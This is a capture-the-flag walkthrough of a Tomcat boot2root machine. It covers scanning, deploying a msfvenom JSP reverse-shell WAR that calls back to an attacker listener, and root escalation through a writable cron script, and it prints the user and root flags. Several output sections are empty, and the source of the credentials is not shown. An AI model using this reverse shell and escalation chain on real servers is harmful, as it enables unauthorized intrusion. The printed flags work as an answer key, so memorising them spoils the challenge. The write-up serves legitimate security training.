This challenge is a boot2root machine for FIT and BSides Guatemala CTF.
Started by performing a basic port scan to identify open services:
nmap -sC -sV -p- 10.10.10.10
Discovered the following open ports:
Performed directory and file enumeration:
gobuster dir -u http://10.10.10.10:8080 -w /usr/share/wordlists/dirb/common.txt
Discovered the following directories and files:
Checked gobuster results with curl to investigate the manager endpoint:
curl -i http://10.10.10.10:8080/manager/html
Discovered the following response details:
The web application was running Apache Tomcat/8.5.5. Searched for vulnerabilities specific to this version.
Identified the Apache Tomcat AJP File Read vulnerability (Ghostcat, CVE-2020-1938).
Apache Tomcat AJP File Read (Ghostcat)Note: Used the found credentials to access the Tomcat Manager and deployed a malicious WAR file using Metasploit and msfvenom.
Created a JSP reverse shell in a WAR file using msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.9.0.54 LPORT=4444 -f war -o shell.war
Opened a listener in Metasploit:
msfconsole use multi/handler set payload java/jsp_shell_reverse_tcp set LHOST 10.9.0.54 set LPORT 4444 run
Logged into the Tomcat Manager using credentials (tomcat:s3cret), uploaded shell.war, which automatically deployed to the server.
Navigated to /shell in the applications list to trigger the reverse shell.
Received a reverse shell in Metasploit:
sessions sessions -i 1
Verified access:
whoami id ls -la
Located the user flag in /home/jack/user.txt:
cat /home/jack/user.txtUser Flag:
39400c90bc683a41a8935e4719f181bf
Identified a cron job running as root every minute, executing /home/jack/id.sh
cat /home/jack/id.sh
#!/bin/bash id > test.txt
The script was writable. Modified it to read the root flag:
echo '#!/bin/bash\ncat /root/root.txt > test.txt' > id.sh
Waited for the cron job to execute. because its running every minute.
Checked test.txt for the flag.
cat test.txtRoot Flag:
d89d5391984c0450a95497153ae7ca3a